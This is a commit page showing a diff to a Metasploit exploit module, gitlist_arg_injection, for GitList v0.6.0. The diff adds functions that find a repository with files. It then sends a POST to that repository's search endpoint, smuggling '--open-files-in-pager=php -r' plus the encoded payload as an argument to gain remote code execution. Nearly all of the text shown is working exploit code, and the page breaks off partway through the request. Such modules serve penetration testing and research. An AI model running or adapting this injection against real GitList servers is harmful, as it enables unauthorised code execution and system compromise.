Land #10278, gitlist_arg_injection fixes

GSoC/Meterpreter_Web_Console
William Vu 2018-07-12 19:03:52 -05:00
commit 2f37482535
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 43 additions and 6 deletions

View File

@ -35,13 +35,19 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'GitList v0.6.0', { } ]
],
'Privileged' => false,
'Payload' => { 'BadChars' => '\'"' },
'Payload' => { 'BadChars' => '\'' },
'DisclosureDate' => "Apr 26 2018",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'Default path to GitList', '/'])
])
end
def check
uri = normalize_uri(target_uri.path, '/gitlist/')
uri = normalize_uri(target_uri.path)
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
@ -54,11 +60,42 @@ class MetasploitModule < Msf::Exploit::Remote
Exploit::CheckCode::Safe
end
def get_repo
repo_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
if repo_res && repo_res.code == 200
repos = repo_res.body.scan(/\/([^\/]+)\/master\/rss\//).flatten
fail_with(Failure::Unreachable, "Could not retrieve any repos") if repos.empty?
return repos.detect{ |r| r if has_files?(r) }
else
fail_with(Failure::Unreachable, "Could not access GitList")
end
end
def has_files?(repo)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, repo, '/')
)
if res && res.code == 200
print_good("Successfully accessed repo #{repo}")
return false if res.body.scan(/#{repo}\/blob\/master\//).flatten.empty?
return true
else
fail_with(Failure::Unreachable, "Couldn't detect files in #{repo}'s repo")
end
end
def exploit
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
cmd = '--open-files-in-pager=php -r "eval(\\"'
cmd << payload.encoded
cmd << '\\");"'
repo = get_repo
fail_with(Failure::Unreachable, "No files found in repos") if repo.nil?
postUri = normalize_uri(target_uri.path, repo << '/tree/c/search')
cmd = "--open-files-in-pager=php -r '#{payload.encoded}'"
send_request_cgi(
'method' => 'POST',
'uri' => postUri,